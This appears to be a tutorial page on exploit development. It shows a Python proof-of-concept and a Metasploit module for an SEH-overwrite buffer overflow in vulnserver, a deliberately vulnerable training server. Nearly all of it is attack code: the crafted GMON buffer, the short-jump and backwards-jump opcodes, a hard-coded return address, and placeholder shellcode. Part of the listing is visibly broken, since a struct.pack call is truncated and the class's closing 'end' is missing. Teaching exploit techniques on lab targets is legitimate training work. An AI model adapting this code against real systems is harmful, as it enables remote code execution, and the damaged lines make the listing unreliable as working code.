Prerequisites: http://resources.infosecinstitute.com/seh-exploit/
Corelan template: http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/
Refreshers on the SEH exploit
Now on to the Python code 🙂
# Proof-of-concept client for the vulnserver GMON SEH overwrite described above.
# The script is Python 2 era code: every buffer is built as a str and passed to
# socket.send() as-is; under Python 3 send() requires bytes, so it would not run unchanged.
# NOTE(review): the listing was collapsed onto one line by the page extraction and is
# reflowed here one statement per line; no tokens were changed.
import sys  # imported but not used anywhere below
import struct
import socket

# Placeholder payload (three INT3 breakpoints); the author expects it to be replaced.
# The byte values that must not appear in the payload are the same ones the
# Metasploit module below declares as BadChars.
shellcode = ("\xCC\xCC\xCC")  # use your own Shellcode bad chars \x00\x0A\x0D
sehp = "\xEB\x0F\x90\x90";  # JMP 0F(15), NOP, NOP (POINTER TO NEXT SEH RECORD)
# NOTE(review): the argument list of this struct.pack call was lost when the page was
# extracted (an opening '<' in the format string was most likely swallowed as markup),
# so the statement is not valid Python as shown. The corresponding value in the
# Metasploit module below is the target's 'Ret' packed with 'V' (little-endian 32-bit).
seho = struct.pack('
longjump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"  # JMP back 768 bytes
# Layout: 2752 + 32 NOPs, payload, NOP padding up to 714 bytes, SEH record (sehp + seho),
# the backwards jump, then 480 bytes of filler. The padding term 714 - len(shellcode) goes
# negative (and the multiplication yields an empty string) once the payload exceeds 714
# bytes, which silently shifts sehp/seho off the offsets this layout assumes; the Metasploit
# module caps the payload at 500 bytes for that reason.
buffer = "\x90" * 2752 + "\x90" * 32 + shellcode + "\x90" * (714 - len(shellcode)) + sehp + seho + longjump + "D" * 480  # makenops 2752 + 32 = 2784

# Connect to a local vulnserver instance on its default port (9999, matching RPORT below).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 9999))
data = s.recv(1024)  # reads the banner; the value is never used
s.send('GMON /' + buffer)
s.close()
This becomes the Metasploit exploit
# Metasploit template from corelan.be
# SEH for vunserver thegreycorner.com
#
# Metasploit port of the Python proof-of-concept above: the exploit method builds the
# same GMON request layout (2752 junk + 32 NOPs + payload + padding to 714 + SEH record
# + backwards jump + 480 junk), with the hard-coded values replaced by the framework's
# payload, target and option handling.
# NOTE(review): `Metasploit3` and `require 'msf/core'` are the legacy module conventions
# of the framework at the time this was written; the listing was also collapsed onto one
# line by the page extraction and the class's closing `end` is missing as shown.
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # A remote exploit
  include Msf::Exploit::Remote::Tcp # using TCP connection

  # Module metadata: name, authors, references, payload constraints and the single target.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Vunserver SEH exploit',
      'Description'    => %q{
        This module exploits an SEH exploit in vulnserver.
      },
      'Author'         => [ 'Stephen Bradshaw','Duncan Winfrey' ],
      'Version'        => '$Revision: 9999 $',
      'References'     =>
        [
          [ 'Vunserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
          [ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      # Space is capped at 500 so that the padding computed in exploit()
      # (714 - payload.encoded.length) can never go negative; the bad characters
      # match the ones noted in the Python script above.
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      # 'Ret' is the value written over the SEH handler; it is specific to this one target.
      'Targets'        =>
        [
          ['Windows NT/2000/XP/2003 ', { 'Ret' => 0x625010b4,} ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false
    ))
    # vulnserver's default listening port, the same one the Python script connects to.
    register_options(
      [
        Opt::RPORT(9999)
      ], self.class)
  end

  # Builds the GMON request in the same order as the Python `buffer` and sends it once.
  def exploit
    connect
    request = 'GMON /'
    request << rand_text_alpha_upper(2752)
    request << make_nops(32)
    request << payload.encoded
    request << rand_text_alpha_upper((714 - payload.encoded.length))
    request << "\xEB\x0F\x90\x90" # Short Jump
    request << [target.ret].pack('V') # SEH Overwrite
    request << "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # go back 768 bytes
    request << rand_text_alpha_upper(480) # junk
    sock.put(request)
    handler
    disconnect
  end
The working module 🙂